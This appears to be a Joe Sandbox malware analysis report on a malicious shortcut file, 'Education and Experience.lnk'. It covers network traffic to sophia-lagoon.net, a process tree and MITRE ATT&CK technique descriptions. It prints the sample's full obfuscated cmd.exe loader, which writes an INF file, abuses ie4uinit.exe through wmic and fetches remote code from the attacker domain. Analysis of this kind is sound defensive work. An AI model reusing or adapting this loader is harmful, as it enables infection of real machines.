TLSH:	F2411A2BE2934A6CCA34A8B406D33655BD3191CA96390AB23514A90B8C6A3233126620
File Content Preview:	PK.........OVu.l.x...;.......Education and Experience.lnk.g........C0..?..J..#.. ...r.(.y.s......}..G....^L....r.3.<u.>.5.a<(^...s....S.j.....G.. 1.._....]..4._!..v......V.zc..,....3.Mx..^{@..U.zh..iI..... ....2-.sK..lA.G.'I.P..l..b...ol~....0x........_

File Icon


Icon Hash:	f4ccccccccccccdc

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Feb 15, 2023 23:30:58.497524977 CET	49727	80	192.168.2.3	142.11.222.59
Feb 15, 2023 23:30:58.636444092 CET	80	49727	142.11.222.59	192.168.2.3
Feb 15, 2023 23:30:58.636617899 CET	49727	80	192.168.2.3	142.11.222.59
Feb 15, 2023 23:30:58.637814045 CET	49727	80	192.168.2.3	142.11.222.59
Feb 15, 2023 23:30:58.776643991 CET	80	49727	142.11.222.59	192.168.2.3
Feb 15, 2023 23:30:59.638983011 CET	80	49727	142.11.222.59	192.168.2.3
Feb 15, 2023 23:30:59.640505075 CET	49727	80	192.168.2.3	142.11.222.59
Feb 15, 2023 23:31:04.644161940 CET	80	49727	142.11.222.59	192.168.2.3
Feb 15, 2023 23:31:04.644273043 CET	49727	80	192.168.2.3	142.11.222.59
Feb 15, 2023 23:31:05.596409082 CET	49727	80	192.168.2.3	142.11.222.59

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Feb 15, 2023 23:30:58.464340925 CET	60716	53	192.168.2.3	1.1.1.1
Feb 15, 2023 23:30:58.487699032 CET	53	60716	1.1.1.1	192.168.2.3

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Feb 15, 2023 23:30:58.464340925 CET	192.168.2.3	1.1.1.1	0x9061	Standard query (0)	sophia-lagoon.net	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Feb 15, 2023 23:30:58.487699032 CET	1.1.1.1	192.168.2.3	0x9061	No error (0)	sophia-lagoon.net		142.11.222.59	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

sophia-lagoon.net

Target ID:	10
Start time:	23:30:53
Start date:	15/02/2023
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\System32\cmd.exe" /v /c set "Lucky50=e" && set "Lucky5=$w" && set "Lucky03=version" && set "Lucky10=d" && (for %u in (a) do @set "Lucky87=%~u") && set "Lucky41=Fast" && call set "Lucky59=%Lucky41:~2,1%" && set "Lucky85=init" && set "Lucky7=t" && set "Lucky26=." && set "Lucky23=settings" && set "Lucky55=si" && (for %q in (c) do @set "Lucky29=%~q") && set "Lucky65=!Lucky26!inf" && set "Lucky15=ieu!Lucky85!!Lucky65!" && call !Lucky59!et "Lucky11=%app!Lucky10!ata%\micro!Lucky59!oft\" && !Lucky59!et "Lucky8=!Lucky11!!Lucky15!" && (for %p in ("[!Lucky03!]" "signature = !Lucky5!indows nt$" "[!Lucky10!e!Lucky59!tinationdirs]" "E4139C=01" "[!Lucky10!efaultin!Lucky59!tall.windows7]" "UnRegis!Lucky7!erOCXs=A687D4" "!Lucky10!elfil!Lucky50!s=E4139C" "[A687D4]" "%11%\scro\" "%Lucky51%j,NI,%Lucky21%%Lucky0%%Lucky0%p%Lucky1%%Lucky9%%Lucky9%sophia-lagoon!Lucky26!%Lucky56%/81754783" "[E4139C]" "ieu%Lucky69%!Lucky65!" "[!Lucky59!!Lucky7!rings]" "Lucky69=!Lucky85!" "Lucky0=t;Lucky40" "!Lucky59!ervicen!Lucky87!me=' '" "Lucky21=h" "Lucky1=:;Lucky35" "Lucky9=/" "!Lucky59!hortsvcn!Lucky87!me=' '" "Lucky56=net" "Lucky51=b;Lucky67" "Lucky25=%time%") do @e!Lucky29!ho %~p)>"!Lucky8!" && !Lucky59!et "Lucky2=ie4u!Lucky85!.!Lucky50!xe" && call xcopy /Y /C /Q %win!Lucky10!ir%\!Lucky59!ystem32\!Lucky2! "!Lucky11!*" \| set Lucky93=Nation && !Lucky59!t!Lucky87!rt "" wmi!Lucky29! proce!Lucky59!s call !Lucky29!rea!Lucky7!e "!Lucky11!!Lucky2! -base!Lucky23!" \| set Lucky28= Occur Elevator Knock Considerations Teens Stool Rankings Offices Message Toward Reviews Discusses Appliances Tasks Scorpion Situations Erase Shock Clean Vault Carriers Twins Disease Dentists Seeks Friends Impulse Vehicles Stand Submissions Night Batteries Cigar Junior Heart Habit Containers Cables Taxes Ostrich Series Incentives Sorts Erode Measurements Investigators Styles Music Actress Items Differ Suits Sources Archives Headphones Texas Emotions Monsters Above Holdings Outputs Characteristics Forecasts Readers Processes Plastic Mosquito Roses Manuals Representatives Editors Elephant Recommendations Roommates Coral Dolphin Offers Focuses Implies Ignore Champions Family Rangers Garlic Blind Evidence Facilities Products Makers Wives Pockets Solaris Vibrant Excess Raven Secrets Celebs Summaries Inherit Crawl Tutorials Stands Upgrade Crowd Betray Orange Patient Entire Weather Cruel Wellness Attention Waters Failures Jewel Buttons Assume Configurations Levels Enemy Labels Memories Ticket Honey Violin Primary Lovers Depends Exceptions Findings Olympics Cousin Kinds Fruits Centres Smart Avoid Mechanic Gorilla Swingers Century Figure Details Renew Careers Embody Shapes Antibodies Motion Interactions Instances Miles Subway Remain Legend Mounts Midnight Mercy Filter Sessions Asthma Shrimp Greetings Autumn
Imagebase:	0x7ff6dc4f0000
File size:	280064 bytes
MD5 hash:	9D59442313565C2E0860B88BF32B2277
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	moderate

Analysis Process: conhost.exePID: 6468, Parent PID: 6460

General

Target ID:	11
Start time:	23:30:53
Start date:	15/02/2023
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7603a0000
File size:	885760 bytes
MD5 hash:	C5E9B1D1103EDCEA2E408E9497A5A88F
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	moderate

Analysis Process: cmd.exePID: 6520, Parent PID: 6460

General

Target ID:	12
Start time:	23:30:54
Start date:	15/02/2023
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\cmd.exe /S /D /c" call xcopy /Y /C /Q %windir%\system32\ie4uinit.exe "C:\Users\user\AppData\Roaming\microsoft\*" "
Imagebase:	0x7ff6dc4f0000
File size:	280064 bytes
MD5 hash:	9D59442313565C2E0860B88BF32B2277
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	moderate

Analysis Process: cmd.exePID: 6532, Parent PID: 6460

General

Target ID:	13
Start time:	23:30:54
Start date:	15/02/2023
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\cmd.exe /S /D /c" set Lucky93=Nation "
Imagebase:	0x7ff6dc4f0000
File size:	280064 bytes
MD5 hash:	9D59442313565C2E0860B88BF32B2277
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	moderate

Analysis Process: xcopy.exePID: 6548, Parent PID: 6520

General

Target ID:	14
Start time:	23:30:54
Start date:	15/02/2023
Path:	C:\Windows\System32\xcopy.exe
Wow64 process (32bit):	false
Commandline:	xcopy /Y /C /Q C:\Windows\system32\ie4uinit.exe "C:\Users\user\AppData\Roaming\microsoft\*"
Imagebase:	0x7ff6cb690000
File size:	47616 bytes
MD5 hash:	F359375C36D2C540DFF1141B11BF2F7F
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	moderate

Analysis Process: cmd.exePID: 6572, Parent PID: 6460

General

Target ID:	15
Start time:	23:30:54
Start date:	15/02/2023
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\cmd.exe /S /D /c" start "" wmic process call create "C:\Users\user\AppData\Roaming\microsoft\ie4uinit.exe -basesettings" "
Imagebase:	0x7ff6dc4f0000
File size:	280064 bytes
MD5 hash:	9D59442313565C2E0860B88BF32B2277
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language

Analysis Process: cmd.exePID: 6580, Parent PID: 6460

General

Target ID:	16
Start time:	23:30:54
Start date:	15/02/2023
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\cmd.exe /S /D /c" set Lucky28= Occur Elevator Knock Considerations Teens Stool Rankings Offices Message Toward Reviews Discusses Appliances Tasks Scorpion Situations Erase Shock Clean Vault Carriers Twins Disease Dentists Seeks Friends Impulse Vehicles Stand Submissions Night Batteries Cigar Junior Heart Habit Containers Cables Taxes Ostrich Series Incentives Sorts Erode Measurements Investigators Styles Music Actress Items Differ Suits Sources Archives Headphones Texas Emotions Monsters Above Holdings Outputs Characteristics Forecasts Readers Processes Plastic Mosquito Roses Manuals Representatives Editors Elephant Recommendations Roommates Coral Dolphin Offers Focuses Implies Ignore Champions Family Rangers Garlic Blind Evidence Facilities Products Makers Wives Pockets Solaris Vibrant Excess Raven Secrets Celebs Summaries Inherit Crawl Tutorials Stands Upgrade Crowd Betray Orange Patient Entire Weather Cruel Wellness Attention Waters Failures Jewel Buttons Assume Configurations Levels Enemy Labels Memories Ticket Honey Violin Primary Lovers Depends Exceptions Findings Olympics Cousin Kinds Fruits Centres Smart Avoid Mechanic Gorilla Swingers Century Figure Details Renew Careers Embody Shapes Antibodies Motion Interactions Instances Miles Subway Remain Legend Mounts Midnight Mercy Filter Sessions Asthma Shrimp Greetings Autumn"
Imagebase:	0x7ff6dc4f0000
File size:	280064 bytes
MD5 hash:	9D59442313565C2E0860B88BF32B2277
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language

Analysis Process: WMIC.exePID: 6604, Parent PID: 6572

General

Target ID:	17
Start time:	23:30:55
Start date:	15/02/2023
Path:	C:\Windows\System32\wbem\WMIC.exe
Wow64 process (32bit):	false
Commandline:	wmic process call create "C:\Users\user\AppData\Roaming\microsoft\ie4uinit.exe -basesettings"
Imagebase:	0x7ff7a6f70000
File size:	508416 bytes
MD5 hash:	29B7D02A3B5F670B5AF2DAF008810863
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language

Analysis Process: conhost.exePID: 6612, Parent PID: 6604

General

Target ID:	18
Start time:	23:30:55
Start date:	15/02/2023
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7603a0000
File size:	885760 bytes
MD5 hash:	C5E9B1D1103EDCEA2E408E9497A5A88F
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language

Analysis Process: ie4uinit.exePID: 6680, Parent PID: 4284

General

Target ID:	19
Start time:	23:30:56
Start date:	15/02/2023
Path:	C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exe
Wow64 process (32bit):	false
Commandline:	C:\Users\user\AppData\Roaming\microsoft\ie4uinit.exe -basesettings
Imagebase:	0x7ff63f4f0000
File size:	228352 bytes
MD5 hash:	AD9AD3C852D59FBF125F02A09F1FF405
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language

Analysis Process: ie4uinit.exePID: 6712, Parent PID: 6680

General

Target ID:	20
Start time:	23:30:56
Start date:	15/02/2023
Path:	C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exe
Wow64 process (32bit):	false
Commandline:	C:\Users\user\AppData\Roaming\microsoft\ie4uinit.exe -ClearIconCache
Imagebase:	0x7ff63f4f0000
File size:	228352 bytes
MD5 hash:	AD9AD3C852D59FBF125F02A09F1FF405
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language

Analysis Process: rundll32.exePID: 6764, Parent PID: 6712

General

Target ID:	21
Start time:	23:30:57
Start date:	15/02/2023
Path:	C:\Windows\System32\rundll32.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\RunDll32.exe C:\Windows\system32\migration\WininetPlugin.dll,MigrateCacheForUser /m /0
Imagebase:	0x7ff7248f0000
File size:	71168 bytes
MD5 hash:	F68AF942FD7CCC0E7BAB1A2335D2AD26
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language

Analysis Process: ie4uinit.exePID: 6788, Parent PID: 3840

General

Target ID:	31
Start time:	23:32:03
Start date:	15/02/2023
Path:	C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exe
Wow64 process (32bit):	false
Commandline:	"C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exe"
Imagebase:	0x7ff63f4f0000
File size:	228352 bytes
MD5 hash:	AD9AD3C852D59FBF125F02A09F1FF405
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language

Analysis Process: ie4uinit.exePID: 2792, Parent PID: 3840

General

Target ID:	32
Start time:	23:32:06
Start date:	15/02/2023
Path:	C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exe
Wow64 process (32bit):	false
Commandline:	"C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exe"
Imagebase:	0x7ff63f4f0000
File size:	228352 bytes
MD5 hash:	AD9AD3C852D59FBF125F02A09F1FF405
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language

Analysis Process: ie4uinit.exePID: 6612, Parent PID: 3840

General

Target ID:	35
Start time:	23:32:20
Start date:	15/02/2023
Path:	C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exe
Wow64 process (32bit):	false
Commandline:	"C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exe"
Imagebase:	0x7ff63f4f0000
File size:	228352 bytes
MD5 hash:	AD9AD3C852D59FBF125F02A09F1FF405
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Disassembly

⊘No disassembly

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to achieve execution. WMI is a Windows administration feature that provides a uniform environment for local and remote access to Windows system components. It relies on the WMI service for local and remote access and the server message block (SMB) and Remote Procedure Call Service (RPCS) for remote access. RPCS operates over port 135.
Tactics:	Execution
Data Sources:	Authentication logs, Netflow/Enclave netflow, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of Unix Shell while Windows installations include the Windows Command Shell and PowerShell .
Tactics:	Execution
Data Sources:	PowerShell logs, Process command-line parameters, Process monitoring, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse task scheduling functionality to facilitate initial or recurring execution of malicious code. Utilities exist within all major operating systems to schedule programs or scripts to be executed at a specified date and time. A task can also be scheduled on a remote system, provided the proper authentication is met (ex: RPC and file and printer sharing in Windows environments). Scheduling a task on a remote system typically requires being a member of an admin or otherwise privileged group on the remote system.
Tactics:	Execution, Persistence, Privilege Escalation
Data Sources:	File monitoring, Process command-line parameters, Process monitoring, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Source: C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exe	Key opened: HKEY_CURRENT_USER_Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}
Source: C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exe	Key opened: HKEY_LOCAL_MACHINE\Software\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}
Source: C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exe	Key opened: HKEY_CURRENT_USER_Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAs
Source: C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAs
Source: C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exe	Key opened: HKEY_CURRENT_USER_Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}
Source: C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exe	Key opened: HKEY_CURRENT_USER_Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}
Source: C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exe	Key opened: HKEY_CURRENT_USER_Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32
Source: C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32
Source: C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exe	Key opened: HKEY_CURRENT_USER_Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32
Source: C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exe	Key opened: HKEY_CURRENT_USER_Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler32
Source: C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler32
Source: C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exe	Key opened: HKEY_CURRENT_USER_Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler
Source: C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler
Source: C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exe	Key opened: HKEY_CURRENT_USER_Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}
Source: C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exe	Key opened: HKEY_LOCAL_MACHINE\Software\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}
Source: C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exe	Key opened: HKEY_CURRENT_USER_Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAs
Source: C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAs
Source: C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exe	Key opened: HKEY_CURRENT_USER_Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}
Source: C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exe	Key opened: HKEY_CURRENT_USER_Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32
Source: C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32
Source: C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exe	Key opened: HKEY_CURRENT_USER_Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler32
Source: C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler32
Source: C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exe	Key opened: HKEY_CURRENT_USER_Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler
Source: C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler
Source: C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exe	Key opened: HKEY_CURRENT_USER_Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\LocalServer32
Source: C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\LocalServer32
Source: C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exe	Key opened: HKEY_CURRENT_USER_Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}
Source: C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exe	Key opened: HKEY_CURRENT_USER_Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\LocalServer
Source: C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\LocalServer
Source: C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exe	Key opened: HKEY_CURRENT_USER_Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}
Source: C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exe	Key opened: HKEY_LOCAL_MACHINE\Software\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}
Source: C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exe	Key opened: HKEY_CURRENT_USER_Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\Elevation
Source: C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\Elevation
Source: C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exe	Key opened: HKEY_CURRENT_USER_Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}
Source: C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exe	Key opened: HKEY_LOCAL_MACHINE\Software\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}
Source: C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exe	Key opened: HKEY_CURRENT_USER_Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAs
Source: C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAs

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, DLL monitoring, File monitoring, Named Pipes, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse rundll32.exe to proxy execution of malicious code. Using rundll32.exe, vice executing directly (i.e. Shared Modules ), may avoid triggering security tools that may not monitor execution of the rundll32.exe process because of allowlists or false positives from normal operations. Rundll32.exe is commonly associated with executing DLL payloads.
Tactics:	Defense Evasion
Data Sources:	DLL monitoring, Loaded DLLs, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify file time attributes to hide new or changes to existing files. Timestomping is a technique that modifies the timestamps of a file (the modify, access, create, and change times), often to mimic files that are in the same folder. This is done, for example, on files that have been modified or created by the adversary so that they do not appear conspicuous to forensic investigators or file analysis tools.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may delete files left behind by the actions of their intrusion activity. Malware, tools, or other non-native files dropped or created on a system by an adversary may leave traces to indicate to what was done within a network and how. Removal of these files can occur during an intrusion, or as part of a post-intrusion process to minimize the adversary's footprint.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, File monitoring, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Files may be copied from an external adversary controlled system through the command and control channel to bring tools into the victim network or through alternate protocols with another tool such as FTP. Files can also be copied over on Mac and Linux with native tools like scp, rsync, and sftp.
Tactics:	Command and Control
Data Sources:	File monitoring, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process command-line parameters, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use a non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Host network interface, Netflow/Enclave netflow, Network intrusion detection system, Network protocol analysis, Packet capture, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	DNS records, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report Education and Experience.lnk(1).zip

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Yara Signatures

Sigma Signatures

Snort Signatures

Joe Sandbox Signatures

Compliance

Spreading

Networking

System Summary

Data Obfuscation

Persistence and Installation Behavior

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

HIPS / PFW / Operating System Protection Evasion

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\Internet Explorer\brndlog.bak

C:\Users\user\AppData\Local\Microsoft\Internet Explorer\brndlog.txt

C:\Users\user\AppData\Local\Microsoft\Internet Explorer\ie4uinit-ClearIconCache.log

C:\Users\user\AppData\Local\Microsoft\Internet Explorer\ie4uinit-basesettings.log

C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exe

C:\Users\user\AppData\Roaming\Microsoft\ieuinit.inf

C:\Users\user\Favorites\Bing.url

C:\Windows\Temp\OLDF396.tmp

\Device\ConDrv

Static File Info

General

File Icon

Network Behavior

Network Port Distribution

TCP Packets

UDP Packets

DNS Queries

DNS Answers

HTTP Request Dependency Graph

Statistics

Behavior

System Behavior

Analysis Process: cmd.exePID: 6460, Parent PID: 3840

General

Analysis Process: conhost.exePID: 6468, Parent PID: 6460

Windows Analysis Report
Education and Experience.lnk(1).zip